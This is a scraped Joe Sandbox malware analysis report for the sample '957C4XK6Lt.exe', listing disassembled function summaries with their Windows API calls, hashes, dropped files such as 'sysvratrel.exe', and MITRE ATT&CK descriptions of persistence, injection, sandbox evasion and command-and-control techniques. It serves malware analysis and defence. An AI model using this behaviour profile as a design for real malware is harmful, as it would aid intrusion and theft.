Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterExchangeInterlocked
String ID:
API String ID: 2223660684-0
Opcode ID: 998351d4031ac32c6d6d10c259f6772ab7bb4c14647e9de6e02c89c2d1c81f5d
Instruction ID: a0dc8c3c5f9b8335a8c68536f832427d4bfc411db9c79380583e721672fa548d
Opcode Fuzzy Hash: 998351d4031ac32c6d6d10c259f6772ab7bb4c14647e9de6e02c89c2d1c81f5d
Instruction Fuzzy Hash: 4F01F7792423009FC7209F26ED84A9B73E8AF45711F00043EE44693650DB39E401CB28

Uniqueness

Uniqueness Score: -1.00%

Function 00406F50 Relevance: 6.0, APIs: 4, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002,?,?,00407C66), ref: 00406F58
SysAllocString.OLEAUT32(00417280), ref: 00406F63
CoUninitialize.OLE32 ref: 00406F88

Part of subcall function 00406FA0: SysFreeString.OLEAUT32(00000000), ref: 004071B8

SysFreeString.OLEAUT32(00000000), ref: 00406F82

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: String$Free$AllocInitializeUninitialize
String ID:
API String ID: 459949847-0
Opcode ID: d37febddbfc04ccb5ddcd79972a62c48e1c377c34fe451ccbb6e607dda6765f2
Instruction ID: 8a6b4e1f6fa2c5cc19a61eea1a68b2ec0aac259eb3575b686c6209df8efe477e
Opcode Fuzzy Hash: d37febddbfc04ccb5ddcd79972a62c48e1c377c34fe451ccbb6e607dda6765f2
Instruction Fuzzy Hash: 98E092B4A40208FBD7009BE0ED0EB8D77349B05305F0040A4F90666291DAB95E80C755

Uniqueness

Uniqueness Score: -1.00%

Function 00406FA0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON

Download Yara Rule

APIs

Part of subcall function 00407230: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407250

SysFreeString.OLEAUT32(00000000), ref: 004071B8

Strings

Microsoft Corporation, xrefs: 00407126

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: CreateFreeInstanceString
String ID: Microsoft Corporation
API String ID: 586785272-3838278685
Opcode ID: e7592a1b6a7ca93a492843d129d0f5c494d0862bf32e99145538b4b10712f6f9
Instruction ID: b15f4297b17ed5f57f8313cde646c824d4e9e4ad422ceb8e026561d0ece074f1
Opcode Fuzzy Hash: e7592a1b6a7ca93a492843d129d0f5c494d0862bf32e99145538b4b10712f6f9
Instruction Fuzzy Hash: 9591FD75A0450ADFCB04DF94C894AAFB3B5BF49304F208169E515BB3E4D734AD42CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0040DBC0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

Part of subcall function 0040DE00: memset.NTDLL ref: 0040DE28
Part of subcall function 0040DE00: InternetCrackUrlA.WININET(0040D8D9,00000000,10000000,0000003C), ref: 0040DE78
Part of subcall function 0040DE00: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DE88
Part of subcall function 0040DE00: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DEC1
Part of subcall function 0040DE00: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DEF7
Part of subcall function 0040DE00: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DF1F
Part of subcall function 0040DE00: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DF68
Part of subcall function 0040DE00: InternetCloseHandle.WININET(00000000), ref: 0040DFF7

Part of subcall function 0040DCF0: SysAllocString.OLEAUT32(00000000), ref: 0040DD1E
Part of subcall function 0040DCF0: CoCreateInstance.OLE32(00412738,00000000,00004401,00412728,00000000), ref: 0040DD46
Part of subcall function 0040DCF0: SysFreeString.OLEAUT32(00000000), ref: 0040DDE1

SysFreeString.OLEAUT32(00000000), ref: 0040DC9B
SysFreeString.OLEAUT32(00000000), ref: 0040DCA5

Strings

%S%S, xrefs: 0040DC86

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
String ID: %S%S
API String ID: 1017111014-3267608656
Opcode ID: e90815c1511221caa1bb4232c4d734c08bee98e5bb0896a31ce96f10b80c8380
Instruction ID: 028390a8fa3b683b7bf8b6e952c0b4b0066608931571745b54bc663e5df7610f
Opcode Fuzzy Hash: e90815c1511221caa1bb4232c4d734c08bee98e5bb0896a31ce96f10b80c8380
Instruction Fuzzy Hash: 4C415BB5E002099FDB04DBE4C885AEFB7B5BF48304F104529E605B7390D778AA45CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040D880 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002,?,?,?,00407C61), ref: 0040D88A

Part of subcall function 0040D950: socket.WS2_32(00000002,00000002,00000011), ref: 0040D96A
Part of subcall function 0040D950: htons.WS2_32(0000076C), ref: 0040D9A0
Part of subcall function 0040D950: inet_addr.WS2_32(239.255.255.250), ref: 0040D9AF
Part of subcall function 0040D950: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D9CD
Part of subcall function 0040D950: bind.WS2_32(000000FF,?,00000010), ref: 0040DA03
Part of subcall function 0040D950: lstrlenA.KERNEL32(00411A90,00000000,?,00000010), ref: 0040DA1C
Part of subcall function 0040D950: sendto.WS2_32(000000FF,00411A90,00000000), ref: 0040DA2B
Part of subcall function 0040D950: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040DA45

Part of subcall function 0040DBC0: SysFreeString.OLEAUT32(00000000), ref: 0040DC9B
Part of subcall function 0040DBC0: SysFreeString.OLEAUT32(00000000), ref: 0040DCA5

Strings

TCP, xrefs: 0040D8FB
UDP, xrefs: 0040D918

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
String ID: TCP$UDP
API String ID: 1519345861-1097902612
Opcode ID: 23e2b161602aa368edb7d0b330d9f7272b4556a0a3daad279aa881e4cc12a6d8
Instruction ID: adc5519654865a9846dc14ee6574ade53ee5e8f68d7e54780b62f97b8647e200
Opcode Fuzzy Hash: 23e2b161602aa368edb7d0b330d9f7272b4556a0a3daad279aa881e4cc12a6d8
Instruction Fuzzy Hash: FE11AFB5E04208EBDB00EFD5EC45BAE7778EB44308F1088AAE510772C2E6785A54CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00405E50 Relevance: 5.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00416C40,?,?,?), ref: 00405E5F
memcpy.NTDLL(00000000,00000000,00000100), ref: 00405E9E
memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F13
LeaveCriticalSection.KERNEL32(00416C40), ref: 00405F30

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: CriticalSectionmemcpy$EnterLeave
String ID:
API String ID: 469056452-0
Opcode ID: 11253c93557e272cfa09b9ef5557470c866ee47475f0489080f61b160b652d5f
Instruction ID: d4c7a0d735d14698d69a5203b24d712139acd761569c954f121491256ddf65dc
Opcode Fuzzy Hash: 11253c93557e272cfa09b9ef5557470c866ee47475f0489080f61b160b652d5f
Instruction Fuzzy Hash: B8216B70A04208ABCB05DB94D885BDFB772EB44304F1481BAE84667281D67DAA85CF9A

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 957C4XK6Lt.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Phishing

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\1[1]

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newtpp[1].exe

C:\Users\user\AppData\Local\Temp\135143440.exe

C:\Users\user\AppData\Local\Temp\1682018248.exe

C:\Users\user\sysvratrel.exe

C:\Users\user\tbtnds.dat

C:\Windows\sysvratrel.exe

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
957C4XK6Lt.exe

Function 00531080 Relevance: 57.9, APIs: 27, Strings: 6, Instructions: 175
filenetworksleepCOMMON

Function 00531320 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 34
networksleepCOMMON

Function 00531390 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 41
fileCOMMON

Function 00531000 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43
sleepprocessCOMMON

Function 00531430 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15
sleepCOMMON

Function 00405910 Relevance: 25.7, APIs: 17, Instructions: 186
clipboardregistryCOMMON

Function 00406B30 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 106
sleepthreadCOMMON

Function 00402020 Relevance: 16.6, APIs: 11, Instructions: 131
networkCOMMON

Function 0040D950 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 117
networkstringCOMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre